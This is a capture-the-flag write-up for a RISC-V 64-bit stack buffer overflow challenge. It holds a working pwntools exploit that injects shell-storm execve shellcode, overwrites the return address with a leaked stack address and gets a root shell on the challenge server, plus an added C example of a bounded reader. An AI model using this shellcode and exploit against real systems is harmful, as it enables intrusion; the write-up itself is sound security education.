Rating: 1.0

# Riskv Business
by mito

## 14 Solves, 494pt

This is a `RISC-V` 64-bit binary challenge.

```
$ file pwnme
pwnme: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=767a1cb9134fcea1f054ec211aacb7bea0c5d0d2, not stripped
```

The vulnerability in this binary is a simple stack buffer overflow (`Stack BoF`).

The program leaks a stack address (`0x4000800c80`) in its prompt.

```
Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells 'BOO!' right in your face?!
(Please file your answer in memory at location 0x4000800c80...):
```

We did not have an environment in which to run a RISC-V 64-bit binary.

First, we installed `QEMU` by following the guide below.

[https://qiita.com/Kosuke_Matsui/items/14aadce506fe3df79600](https://qiita.com/Kosuke_Matsui/items/14aadce506fe3df79600)

We were able to run this binary locally on Ubuntu 16.04 LTS (64-bit).

```
$ qemu-riscv64 ./pwnme
Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells 'BOO!' right in your face?!
(Please file your answer in memory at location 0x40007ffd90...):AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EXACTLY: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)
```

Furthermore, we were able to decompile this binary with `Ghidra` by installing the RISC-V processor module from the following repository.

[https://github.com/mumbel/ghidra_riscv](https://github.com/mumbel/ghidra_riscv)

The decompiled `main` function is as follows.

```
int main(void)

{
  char acStack96 [8];
  char buff [80];
  
  puts(
      "Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells \'BOO!\' right in your face?!"
      );
  printf("(Please file your answer in memory at location %p...):",acStack96);
  fflush((FILE *)stdout);
  mygets(acStack96);
  printf("EXACTLY: %s\n");
  return 0;
}
```
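The bug is visible in the decompiled listing: `mygets` reads a whole line into `acStack96` with no length bound, so 88 bytes of input reach the saved return address, which is exactly the distance the exploit below pads to. The C below is an added example, not the challenge's code or the writeup author's: it reimplements the unbounded reader (an assumption about what `mygets` does, labelled as such in the comments), feeds it from a constructed in-memory buffer standing in for stdin so it runs offline, and contrasts it with a bounded reader that always NUL-terminates, drains the rest of the line and reports truncation so the caller can reject an over-long answer.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Sizes from the page: the decompiled main declares an 8-byte answer buffer,
 * and the exploit pads to 88 bytes before reaching the saved return address. */
#define ANSWER_CAP 8
#define SAVED_RA_OFFSET 88
#define LOCAL_RUN_LEN 136 /* length of the line of 'A's in the local run above */

/* Constructed in-memory input source standing in for stdin, so the example
 * runs offline (the real binary reads from the terminal or socket). */
typedef struct {
    const char *data;
    size_t len;
    size_t pos;
} input_t;

static int next_byte(input_t *in) {
    return in->pos < in->len ? (unsigned char)in->data[in->pos++] : EOF;
}

/* Assumed reimplementation of the gets()-style reader main calls as mygets():
 * copies bytes until newline or EOF with no bound. Returns bytes written
 * including the NUL. Only ever called here with a scratch buffer large enough
 * for the input, so the overflow is measured, not actually triggered. */
static size_t mygets_unbounded(char *dst, input_t *in) {
    size_t n = 0;
    int c;
    while ((c = next_byte(in)) != EOF && c != '\n')
        dst[n++] = (char)c;
    dst[n] = '\0';
    return n + 1;
}

typedef struct {
    size_t len;    /* bytes stored, excluding the NUL */
    int truncated; /* 1 if the line did not fit in cap - 1 bytes */
} read_result_t;

/* Bounded replacement: writes at most cap bytes, always NUL-terminates, drains
 * the rest of an over-long line so it is not replayed into the next read, and
 * reports truncation so the caller can reject the answer instead of using it. */
static read_result_t read_line_bounded(char *dst, size_t cap, input_t *in) {
    read_result_t r = {0, 0};
    int c;
    if (cap == 0)
        return r;
    while ((c = next_byte(in)) != EOF && c != '\n') {
        if (r.len + 1 < cap)
            dst[r.len++] = (char)c;
        else
            r.truncated = 1; /* drop the byte but keep draining */
    }
    dst[r.len] = '\0';
    return r;
}

/* Reconstruct the local-run input: LOCAL_RUN_LEN 'A's and a newline. */
static input_t local_run_input(char *line) {
    memset(line, 'A', LOCAL_RUN_LEN);
    line[LOCAL_RUN_LEN] = '\n';
    input_t in = {line, LOCAL_RUN_LEN + 1, 0};
    return in;
}

/* Bytes the unbounded reader writes for the local-run line: 137. */
static size_t unbounded_bytes_for_local_run(void) {
    char line[LOCAL_RUN_LEN + 1];
    char scratch[256]; /* deliberately large: measure, do not overflow */
    input_t in = local_run_input(line);
    return mygets_unbounded(scratch, &in);
}

/* What the bounded reader stores for the local-run line: 7 bytes, truncated. */
static read_result_t bounded_result_for_local_run(void) {
    char line[LOCAL_RUN_LEN + 1];
    char answer[ANSWER_CAP];
    input_t in = local_run_input(line);
    return read_line_bounded(answer, sizeof answer, &in);
}

/* Same for any constructed NUL-terminated line, e.g. a normal short answer. */
static read_result_t bounded_result_for(const char *text) {
    char answer[ANSWER_CAP];
    input_t in = {text, strlen(text), 0};
    return read_line_bounded(answer, sizeof answer, &in);
}

int main(void) {
    size_t written = unbounded_bytes_for_local_run();
    read_result_t r = bounded_result_for_local_run();
    printf("unbounded: %zu bytes written, saved ra %s\n", written,
           written > SAVED_RA_OFFSET ? "overwritten" : "intact");
    printf("bounded: %zu bytes stored, truncated=%d\n", r.len, r.truncated);
    return 0;
}
```

Built with any C99 compiler, it reports that the 136-byte line from the local run makes the unbounded reader write 137 bytes, well past the 88-byte distance to the saved return address, while the bounded reader keeps only the 7 bytes that fit in the declared buffer and flags the line as truncated so the program can refuse it rather than echo a corrupted frame.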

We used the `RISC-V shellcode` below.

[http://shell-storm.org/shellcode/files/shellcode-908.php](http://shell-storm.org/shellcode/files/shellcode-908.php)

```
| entry0 ();
| 0x000100b0 0111 addi sp, sp, -32 ; [01] -r-x section size 76 named .text
| 0x000100b2 06ec sd ra, 24(sp)
| 0x000100b4 22e8 sd s0, 16(sp)
| 0x000100b6 13042102 addi s0, sp, 34
| 0x000100ba b767696e lui a5, 0x6e696
| 0x000100be 9387f722 addi a5, a5, 559
| 0x000100c2 2330f4fe sd a5, -32(s0)
| 0x000100c6 b7776810 lui a5, 0x10687
| 0x000100ca 33480801 xor a6, a6, a6
| 0x000100ce 0508 addi a6, a6, 1
| 0x000100d0 7208 slli a6, a6, 0x1c
| 0x000100d2 b3870741 sub a5, a5, a6
| 0x000100d6 9387f732 addi a5, a5, 815
| 0x000100da 2332f4fe sd a5, -28(s0)
| 0x000100de 930704fe addi a5, s0, -32
| 0x000100e2 0146 li a2, 0
| 0x000100e4 8145 li a1, 0
| 0x000100e6 3e85 mv a0, a5
| 0x000100e8 9308d00d li a7, 221
| 0x000100ec 93063007 li a3, 115
| 0x000100f0 230ed1ee sb a3, -260(sp)
| 0x000100f4 9306e1ef addi a3, sp, -258
\ 0x000100f8 6780e6ff jr -2(a3)
```

We tried debugging with `gdb-multiarch` and `gef`, but they could not completely disassemble `RISC-V` code.

Therefore, we wrote the exploit code by referring to the decompiled C code.

The exploit code and its execution result are below.

```
# Python 2 / pwntools
from pwn import *
import sys

#context.log_level = 'debug'

BINARY = './pwnme'
#elf = ELF(BINARY)

# RISC-V 64-bit shellcode from shell-storm (shellcode-908), the same bytes as
# the disassembly listing above
shellcode = "\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xee\x93\x06\xe1\xef\x67\x80\xe6\xff"

if len(sys.argv) > 1 and sys.argv[1] == 'r':
    HOST = "cha.hackpack.club"
    PORT = 41700
    s = remote(HOST, PORT)
elif len(sys.argv) > 1 and sys.argv[1] == 'd':
    # QEMU waits for a gdb-multiarch connection on port 1337
    s = process("qemu-riscv64 -g 1337 ./pwnme", shell=True)
else:
    s = process("qemu-riscv64 ./pwnme", shell=True)

# The prompt prints the address of the answer buffer (acStack96)
s.recvuntil("location 0x")
r = s.recvuntil(".")[:-1]

stack_addr = int(r, 16)
print "stack_addr =", hex(stack_addr)

s.recvuntil("):")

# Shellcode at the start of the buffer, padding up to the saved return
# address (88 bytes from the buffer), then the leaked buffer address
buf = shellcode
buf += "A"*(88-len(buf))
buf += p64(stack_addr)
s.sendline(buf)

s.interactive()
'''
mito@ubuntu:~/CTF/HackPack_CTF_2020/Pwn_Riskv_Business$ python solve.py r
[+] Opening connection to cha.hackpack.club on port 41700: Done
stack_addr = 0x4000800c80
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ cd /app
$ ls -l
total 3772
-rw-rw-r-- 1 root root 47 Apr 13 15:47 flag.txt
-rwxr-xr-x 1 root root 447800 Apr 13 15:57 pwnme
-rwxrwxr-x 1 root root 3406664 Apr 13 15:47 qemu-riscv64-static
$ cat flag.txt
flag{mayb3_1t_w1ll_w0rk_th3_f1fth_t1m3_ar0und}
'''
```